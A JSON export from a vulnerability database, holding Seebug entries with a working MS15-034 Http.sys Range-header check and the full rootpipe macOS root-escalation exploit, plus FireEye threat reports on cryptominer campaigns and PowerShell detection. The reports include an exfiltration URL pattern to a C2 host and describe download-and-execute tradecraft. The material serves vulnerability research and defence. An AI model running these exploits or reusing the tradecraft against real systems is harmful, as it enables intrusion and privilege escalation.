href=\"http://blog.knownsec.com/wp-content/uploads/2015/04/IIS%E7%B3%BB%E5%88%97Http.sys%E5%A4%84%E7%90%86Range%E6%95%B4%E6%95%B0%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E-%E5%BA%94%E6%80%A5%E5%88%86%E6%9E%90%E6%8A%A5%E5%91%8AV1-.pdf\">IIS\u7cfb\u5217Http.sys\u5904\u7406Range\u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e \u5e94\u6025\u5206\u6790\u62a5\u544aV1</a><br></p>", "cvss3": {}, "published": "2015-07-01T00:00:00", "type": "seebug", "title": "IIS \u7cfb\u5217 Http.sys \u5904\u7406 Range \u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1635"], "modified": "2015-07-01T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89233", "id": "SSV:89233", "sourceData": "\n #!/usr/bin/env python\r\n# coding: utf-8\r\n\r\nimport socket\r\nimport random\r\nfrom urlparse import urljoin\r\nfrom pocsuite.net import req\r\nfrom pocsuite.poc import POCBase, Output\r\nfrom pocsuite.utils import register\r\nfrom lib.utils.funs import url2ip\r\n\r\n\r\nclass TestPOC(POCBase):\r\n vulID = '89233' # vul ID\r\n version = '1'\r\n author = ['cnyql']\r\n vulDate = '2015-04-14'\r\n createDate = '2015-04-16'\r\n updateDate = '2015-09-19'\r\n references = ['http://www.sebug.net/vuldb/ssvid-89233']\r\n name = 'IIS \u7cfb\u5217 Http.sys \u5904\u7406 Range \u6574\u6570\u6ea2\u51fa\u6f0f\u6d1e'\r\n appPowerLink = 'http://www.iis.net/'\r\n appName = 'Miscrosoft IIS httpd'\r\n appVersion = 'N/A'\r\n vulType = 'Buffer Overflow'\r\n desc = '''\r\n 2015\u5e7404\u670814\u65e5\uff0c\u5fae\u8f6f\u53d1\u5e03\u4e25\u91cd\u7ea7\u522b\u7684\u5b89\u5168\u516c\u544a MS15-034\uff0c\u7f16\u53f7\u4e3a CVE-2015-1635\uff0c\u636e\u79f0\u5728 Http.sys \u4e2d\u7684\u6f0f\u6d1e\u53ef\u80fd\u5141\u8bb8\u8fdc\u7a0b\u6267\u884c\u4ee3\u7801\u3002\r\n '''\r\n\r\n def _verify(self):\r\n\r\n ip = url2ip(self.url)\r\n hexAllFfff = \"18446744073709551615\"\r\n flag = False\r\n req1 = \"GET /HTTP/1.0\\r\\n\\r\\n\"\r\n req = \"GET /HTTP/1.1\\r\\nHost: stuff\\r\\nRange: bytes=0-\" + hexAllFfff + \"\\r\\n\\r\\n\"\r\n\r\n client_socket =socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ip, 80))\r\n client_socket.send(req1)\r\n boringResp = client_socket.recv(1024)\r\n\r\n if \"Microsoft\" in boringResp:\r\n client_socket.close()\r\n client_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\r\n client_socket.connect((ip,80))\r\n client_socket.send(req)\r\n goodResp = client_socket.recv(1024)\r\n\r\n if \"Requested RangeNot Satisfiable\" in goodResp:\r\n flag = True\r\n\r\n return self.parse_verify(flag)\r\n\r\n def parse_verify(self, flag):\r\n output = Output(self)\r\n result = {}\r\n\r\n if flag:\r\n result['VerifyInfo'] = {}\r\n result['VerifyInfo']['URL'] = res.url\r\n output.success(result)\r\n \r\n else:\r\n output.fail('No vulnerability found.')\r\n\r\n return output\r\n\t\t\r\n def _attack(self):\r\n return self._verify()\r\n\r\n\r\nregister(TestPOC)\r\n\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89233", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2017-11-19T12:29:20", "description": "<p>\u6f0f\u6d1e\u540d\u79f0:Apple OS X Admin Framework \u5b89\u5168\u6f0f\u6d1e<br></p><p>\u7d27\u6025\u7a0b\u5ea6:\u9ad8\u5371<br></p><p>\u6f0f\u6d1e\u7c7b\u578b: \u672c\u5730\u63d0\u6743<br></p><p>\u8be6\u7ec6\u4fe1\u606f\uff1a</p><p>Apple OS X\u662f\u7f8e\u56fd\u82f9\u679c\uff08Apple\uff09\u516c\u53f8\u4e3aMac\u8ba1\u7b97\u673a\u6240\u5f00\u53d1\u7684\u4e00\u5957\u4e13\u7528\u64cd\u4f5c\u7cfb\u7edf\u3002</p><p>Apple OS X 10.10.2\u53ca\u4e4b\u524d\u7248\u672c\u7684Admin Framework\u4e2d\u7684XPC\u5b9e\u73b0\u8fc7\u7a0b\u4e2d\u5b58\u5728\u5b89\u5168\u6f0f\u6d1e\u3002\u672c\u5730\u653b\u51fb\u8005\u53ef\u5229\u7528\u8be5\u6f0f\u6d1e\u7ed5\u8fc7\u8eab\u4efd\u9a8c\u8bc1\uff0c\u83b7\u53d6\u7ba1\u7406\u5458\u6743\u9650\u3002</p><div class=\"simditor-table\"><br></div>", "cvss3": {}, "published": "2015-09-10T00:00:00", "type": "seebug", "title": "Mac OS X < 10.7.5, 10.8.2, 10.9.5 10.10.2 - rootpipe \u672c\u5730\u63d0\u6743\u6f0f\u6d1e", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2015-1130"], "modified": "2015-09-10T00:00:00", "href": "https://www.seebug.org/vuldb/ssvid-89389", "id": "SSV:89389", "sourceData": "\n ########################################################\r\n#\r\n# PoC exploit code for rootpipe (CVE-2015-1130)\r\n#\r\n# Created by Emil Kvarnhammar, TrueSec\r\n#\r\n# Tested on OS X 10.7.5, 10.8.2, 10.9.5 and 10.10.2\r\n#\r\n########################################################\r\nimport os\r\nimport sys\r\nimport platform\r\nimport re\r\nimport ctypes\r\nimport objc\r\nimport sys\r\nfrom Cocoa import NSData, NSMutableDictionary, NSFilePosixPermissions\r\nfrom Foundation import NSAutoreleasePool\r\n \r\ndef load_lib(append_path):\r\n return ctypes.cdll.LoadLibrary(\"/System/Library/PrivateFrameworks/\" + append_path);\r\n \r\ndef use_old_api():\r\n return re.match(\"^(10.7|10.8)(.\\d)?$\", platform.mac_ver()[0])\r\n \r\n \r\nargs = sys.argv\r\n \r\nif len(args) != 3:\r\n print \"usage: exploit.py source_binary dest_binary_as_root\"\r\n sys.exit(-1)\r\n \r\nsource_binary = args[1]\r\ndest_binary = os.path.realpath(args[2])\r\n \r\nif not os.path.exists(source_binary):\r\n raise Exception(\"file does not exist!\")\r\n \r\npool = NSAutoreleasePool.alloc().init()\r\n \r\nattr = NSMutableDictionary.alloc().init()\r\nattr.setValue_forKey_(04777, NSFilePosixPermissions)\r\ndata = NSData.alloc().initWithContentsOfFile_(source_binary)\r\n \r\nprint \"will write file\", dest_binary\r\n \r\nif use_old_api():\r\n adm_lib = load_lib(\"/Admin.framework/Admin\")\r\n Authenticator = objc.lookUpClass(\"Authenticator\")\r\n ToolLiaison = objc.lookUpClass(\"ToolLiaison\")\r\n SFAuthorization = objc.lookUpClass(\"SFAuthorization\")\r\n \r\n authent = Authenticator.sharedAuthenticator()\r\n authref = SFAuthorization.authorization()\r\n \r\n # authref with value nil is not accepted on OS X <= 10.8\r\n authent.authenticateUsingAuthorizationSync_(authref)\r\n st = ToolLiaison.sharedToolLiaison()\r\n tool = st.tool()\r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr)\r\nelse:\r\n adm_lib = load_lib(\"/SystemAdministration.framework/SystemAdministration\")\r\n WriteConfigClient = objc.lookUpClass(\"WriteConfigClient\")\r\n client = WriteConfigClient.sharedClient()\r\n client.authenticateUsingAuthorizationSync_(None)\r\n tool = client.remoteProxy()\r\n \r\n tool.createFileWithContents_path_attributes_(data, dest_binary, attr, 0)\r\n \r\n \r\nprint \"Done!\"\r\n \r\ndel pool\n ", "sourceHref": "https://www.seebug.org/vuldb/ssvid-89389", "cvss": {"score": 7.2, "vector": "AV:LOCAL/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "fireeye": [{"lastseen": "2021-11-04T00:24:47", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T16:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques\nUsed Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T16:30:00", "id": "FIREEYE:57B0F10A16E18DC672833B1812005B76", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2018-08-31T00:18:23", "description": "#### Introduction\n\nFireEye researchers recently observed threat actors abusing CVE-2017-10271 to deliver various cryptocurrency miners.\n\nCVE-2017-10271 is a known input validation vulnerability that exists in the WebLogic Server Security Service (WLS Security) in Oracle WebLogic Server versions 12.2.1.2.0 and prior, and attackers can exploit it to remotely execute arbitrary code. Oracle released a [Critical Patch Update](<http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html>) that reportedly fixes this vulnerability. Users who failed to patch their systems may find themselves mining cryptocurrency for threat actors.\n\nFireEye observed a high volume of activity associated with the exploitation of CVE-2017-10271 following the public posting of proof of concept code in December 2017. Attackers then leveraged this vulnerability to download cryptocurrency miners in victim environments.\n\nWe saw evidence of organizations located in various countries \u2013 including the United States, Australia, Hong Kong, United Kingdom, India, Malaysia, and Spain, as well as those from nearly every industry vertical \u2013 being impacted by this activity. Actors involved in cryptocurrency mining operations mainly exploit opportunistic targets rather than specific organizations. This coupled with the diversity of organizations potentially affected by this activity suggests that the external targeting calculus of these attacks is indiscriminate in nature.\n\nThe recent cryptocurrency boom has resulted in a growing number of operations \u2013 employing diverse tactics \u2013 aimed at stealing cryptocurrencies. The idea that these cryptocurrency mining operations are less risky, along with the potentially nice profits, could lead cyber criminals to begin shifting away from ransomware campaigns.\n\n#### Tactic #1: Delivering the miner directly to a vulnerable server\n\nSome tactics we've observed involve exploiting CVE-2017-10271, leveraging PowerShell to download the miner directly onto the victim\u2019s system (Figure 1), and executing it using ShellExecute().\n\n \nFigure 1: Downloading the payload directly\n\n#### Tactic #2: Utilizing PowerShell scripts to deliver the miner\n\nOther tactics involve the exploit delivering a PowerShell script, instead of downloading the executable directly (Figure 2).\n\n \nFigure 2: Exploit delivering PowerShell script\n\nThis script has the following functionalities:\n\n * **Downloading miners from remote servers**\n\n \nFigure 3: Downloading cryptominers\n\nAs shown in Figure 3, the .ps1 script tries to download the payload from the remote server to a vulnerable server.\n\n * **Creating scheduled tasks for persistence**\n\n \nFigure 4: Creation of scheduled task\n\n * **Deleting scheduled tasks of other known cryptominers**\n\n \nFigure 5: Deletion of scheduled tasks related to other miners\n\nIn Figure 4, the cryptominer creates a scheduled task with name \u201c_Update service for Oracle products1_\u201d. In Figure 5, a different variant deletes this task and other similar tasks after creating its own, \u201c_Update service for Oracle productsa_\u201d. \n\nFrom this, it\u2019s quite clear that different attackers are fighting over the resources available in the system.\n\n * **Killing processes matching certain strings associated with other cryptominers**\n\n \nFigure 6: Terminating processes directly\n\n \nFigure 7: Terminating processes matching certain strings\n\nSimilar to scheduled tasks deletion, certain known mining processes are also terminated (Figure 6 and Figure 7).\n\n * **Connects to mining pools with wallet key**\n\n \nFigure 8: Connection to mining pools\n\nThe miner is then executed with different flags to connect to mining pools (Figure 8). Some of the other observed flags are: -a for algorithm, -k for keepalive to prevent timeout, -o for URL of mining server, -u for wallet key, -p for password of mining server, and -t for limiting the number of miner threads.\n\n * **Limiting CPU usage to avoid suspicion**\n\n \nFigure 9: Limiting CPU Usage\n\nTo avoid suspicion, some attackers are limiting the CPU usage of the miner (Figure 9).\n\n#### Tactic #3: Lateral movement across Windows environments using Mimikatz and EternalBlue\n\nSome tactics involve spreading laterally across a victim\u2019s environment using dumped Windows credentials and the [EternalBlue](<https://www.fireeye.com/blog/threat-research/2017/05/smb-exploited-wannacry-use-of-eternalblue.html>) vulnerability ([CVE-2017-0144](<https://docs.microsoft.com/en-us/security-updates/securitybulletins/2017/ms17-010>)).\n\nThe malware checks whether its running on a 32-bit or 64-bit system to determine which PowerShell script to grab from the command and control (C2) server. It looks at every network adapter, aggregating all destination IPs of established non-loopback network connections. Every IP address is then tested with extracted credentials and a credential-based execution of PowerShell is attempted that downloads and executes the malware from the C2 server on the target machine. This variant maintains persistence via WMI (Windows Management Instrumentation).\n\nThe malware also has the capability to perform a [Pass-the-Hash](<https://en.wikipedia.org/wiki/Pass_the_hash>) attack with the NTLM information derived from Mimikatz in order to download and execute the malware in remote systems.\n\nAdditionally, the malware exfiltrates stolen credentials to the attacker via an HTTP GET request to: 'http://<C2>:8000/api.php?data=<credential data>'.\n\nIf the lateral movement with credentials fails, then the malware uses PingCastle MS17-010 scanner (PingCastle is a French Active Directory security tool) to scan that particular host to determine if its vulnerable to EternalBlue, and uses it to spread to that host.\n\nAfter all network derived IPs have been processed, the malware generates random IPs and uses the same combination of PingCastle and EternalBlue to spread to that host.\n\n#### Tactic #4: Scenarios observed in Linux OS\n\nWe\u2019ve also observed this vulnerability being exploited to deliver shell scripts (Figure 10) that have functionality similar to the PowerShell scripts.\n\n \nFigure 10: Delivery of shell scripts\n\nThe shell script performs the following activities:\n\n * **Attempts to kill already running cryptominers**\n\n \nFigure 11: Terminating processes matching certain strings\n\n * **Downloads and executes cryptominer malware**\n\n \nFigure 12: Downloading CryptoMiner\n\n * **Creates a cron job to maintain persistence**\n\n \nFigure 13: Cron job for persistence\n\n * **Tries to kill other potential miners to hog the CPU usage**\n\n \nFigure 14: Terminating other potential miners\n\nThe function shown in Figure 14 is used to find processes that have high CPU usage and terminate them. This terminates other potential miners and maximizes the utilization of resources.\n\n#### Conclusion\n\nUse of cryptocurrency mining malware is a popular tactic leveraged by financially-motivated cyber criminals to make money from victims. We\u2019ve observed one threat actor mining around 1 XMR/day, demonstrating the potential profitability and reason behind the recent rise in such attacks. Additionally, these operations may be perceived as less risky when compared to ransomware operations, since victims may not even know the activity is occurring beyond the slowdown in system performance.\n\nNotably, cryptocurrency mining malware is being distributed using various tactics, typically in an opportunistic and indiscriminate manner so cyber criminals will maximize their outreach and profits.\n\nFireEye HX, being a behavior-based solution, is not affected by cryptominer tricks. FireEye HX detects these threats at the initial level of the attack cycle, when the attackers attempt to deliver the first stage payload or when the miner tries to connect to mining pools.\n\nAt the time of writing, FireEye HX detects this activity with the following indicators:\n\n**Detection Name** \n \n--- \n \nPOWERSHELL DOWNLOADER (METHODOLOGY) \n \nMONERO MINER (METHODOLOGY) \n \nMIMIKATZ (CREDENTIAL STEALER) \n \n#### Indicators of Compromise\n\n**MD5**\n\n| \n\n**Name** \n \n---|--- \n \n3421A769308D39D4E9C7E8CAECAF7FC4\n\n| \n\ncranberry.exe/logic.exe \n \nB3A831BFA590274902C77B6C7D4C31AE\n\n| \n\nxmrig.exe/yam.exe \n \n26404FEDE71F3F713175A3A3CEBC619B\n\n| \n\n1.ps1 \n \nD3D10FAA69A10AC754E3B7DDE9178C22\n\n| \n\n2.ps1 \n \n9C91B5CF6ECED54ABB82D1050C5893F2\n\n| \n\ninfo3.ps1 \n \n3AAD3FABF29F9DF65DCBD0F308FF0FA8\n\n| \n\ninfo6.ps1 \n \n933633F2ACFC5909C83F5C73B6FC97CC\n\n| \n\nlower.css \n \nB47DAF937897043745DF81F32B9D7565\n\n| \n\nlib.css \n \n3542AC729035C0F3DB186DDF2178B6A0\n\n| \n\nbootstrap.css \n \nThanks to Dileep Kumar Jallepalli and Charles Carmakal for their help in the analysis.\n", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 8.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-02-15T11:30:00", "type": "fireeye", "title": "CVE-2017-10271 Used to Deliver CryptoMiners: An Overview of Techniques Used Post-Exploitation and Pre-Mining", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-0144", "CVE-2017-10271"], "modified": "2018-02-15T11:30:00", "id": "FIREEYE:399092589F455855881447C60B56C21A", "href": "https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T00:18:22", "description": "#### Introduction****\n\nCyber security vendors and researchers have reported for years how PowerShell is being used by cyber threat actors to [install backdoors](<https://www.fireeye.com/blog/threat-research/2017/02/spear_phishing_techn.html>), [execute malicious code](<https://www.csoonline.com/article/3227046/malware/what-is-a-fileless-attack-how-hackers-invade-systems-without-installing-software.html>), and otherwise achieve their objectives within enterprises. Security is a cat-and-mouse game between adversaries, researchers, and blue teams. The flexibility and capability of PowerShell has made conventional detection both challenging and critical. This blog post will illustrate how FireEye is leveraging artificial intelligence and machine learning to raise the bar for adversaries that use PowerShell.\n\nIn this post you will learn:\n\n * Why malicious PowerShell can be challenging to detect with a traditional \u201csignature-based\u201d or \u201crule-based\u201d detection engine.\n * How Natural Language Processing (NLP) can be applied to tackle this challenge.\n * How our NLP model detects malicious PowerShell commands, even if obfuscated.\n * The economics of increasing the cost for the adversaries to bypass security solutions, while potentially reducing the release time of security content for detection engines.\n\n#### Background****\n\nPowerShell is one of the most [popular tools](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) used to carry out attacks. Data gathered from FireEye Dynamic Threat Intelligence (DTI) Cloud shows malicious PowerShell attacks rising throughout 2017 (Figure 1).\n\n \nFigure 1: PowerShell attack statistics observed by FireEye DTI Cloud in 2017 \u2013 blue bars for the number of attacks detected, with the red curve for exponentially smoothed time series\n\nFireEye has been tracking the malicious use of PowerShell for years. In 2014, Mandiant incident response investigators published a Black Hat paper that covers the [tactics, techniques and procedures (TTPs) used in PowerShell attacks](<https://www.blackhat.com/docs/us-14/materials/us-14-Kazanciyan-Investigating-Powershell-Attacks-WP.pdf>), as well as forensic artifacts on disk, in logs, and in memory produced from malicious use of PowerShell. In 2016, we published a blog post on how to [improve PowerShell logging](<https://www.fireeye.com/blog/threat-research/2016/02/greater_visibilityt.html>), which gives greater visibility into potential attacker activity. More recently, our in-depth report on [APT32](<https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html>) highlighted this threat actor's use of PowerShell for reconnaissance and lateral movement procedures, as illustrated in Figure 2.\n\n \nFigure 2: APT32 attack lifecycle, showing PowerShell attacks found in the kill chain\n\nLet\u2019s take a deep dive into an example of a malicious PowerShell command (Figure 3).\n\n \nFigure 3: Example of a malicious PowerShell command\n\nThe following is a quick explanation of the [arguments](<https://docs.microsoft.com/en-us/powershell/scripting/powershell-scripting?view=powershell-6>):\n\n * -NoProfile \u2013 indicates that the current user\u2019s profile setup script should not be executed when the PowerShell engine starts.\n * -NonI \u2013 shorthand for -NonInteractive, meaning an interactive prompt to the user will not be presented.\n * -W Hidden \u2013 shorthand for \u201c-WindowStyle Hidden\u201d, which indicates that the PowerShell session window should be started in a hidden manner.\n * -Exec Bypass \u2013 shorthand for \u201c-ExecutionPolicy Bypass\u201d, which disables the execution policy for the current PowerShell session (default disallows execution). It should be noted that the Execution Policy isn\u2019t meant to be a security boundary.\n * -encodedcommand \u2013 indicates the following chunk of text is a base64 encoded command.\n\nWhat is hidden inside the Base64 decoded portion? Figure 4 shows the decoded command.\n\n \nFigure 4: The decoded command for the aforementioned example\n\nInterestingly, the decoded command unveils a stealthy fileless network access and remote content execution!\n\n * _IEX_ is an alias for the _Invoke-Expression_ cmdlet that will execute the command provided on the local machine.\n * **The _new-object_** cmdlet creates an instance of a .NET Framework or COM object, here a _net.webclient_ object.\n * The _downloadstring_ will download the contents from <url> into a memory buffer (which in turn _IEX_ will execute).\n\nIt\u2019s worth mentioning that a similar malicious PowerShell tactic was used in a recent cryptojacking attack exploiting [CVE-2017-10271 to deliver a cryptocurrency miner](<https://www.fireeye.com/blog/threat-research/2018/02/cve-2017-10271-used-to-deliver-cryptominers.html>). This attack involved the exploit being leveraged to deliver a PowerShell script, instead of downloading the executable directly. This PowerShell command is particularly stealthy because it leaves practically zero file artifacts on the host, making it hard for traditional antivirus to detect.\n\nThere are several reasons why adversaries prefer PowerShell:\n\n 1. PowerShell has been widely adopted in Microsoft Windows as a powerful system administration scripting tool.\n 2. Most attacker logic can be written in PowerShell without the need to install malicious binaries. This enables a minimal footprint on the endpoint.\n 3. The flexible PowerShell syntax imposes combinatorial complexity challenges to signature-based detection rules.\n\nAdditionally, from an economics perspective:\n\n * Offensively, the cost for adversaries to modify PowerShell to bypass a signature-based rule is quite low, especially with [open source obfuscation tools](<https://www.fireeye.com/blog/threat-research/2017/07/revoke-obfuscation-powershell.html>).\n * Defensively, updating handcrafted signature-based rules for new threats is time-consuming and limited to experts.\n\nNext, we would like to share how we at FireEye are combining our PowerShell threat research with data science to combat this threat, thus raising the bar for adversaries.\n\n#### Natural Language Processing for 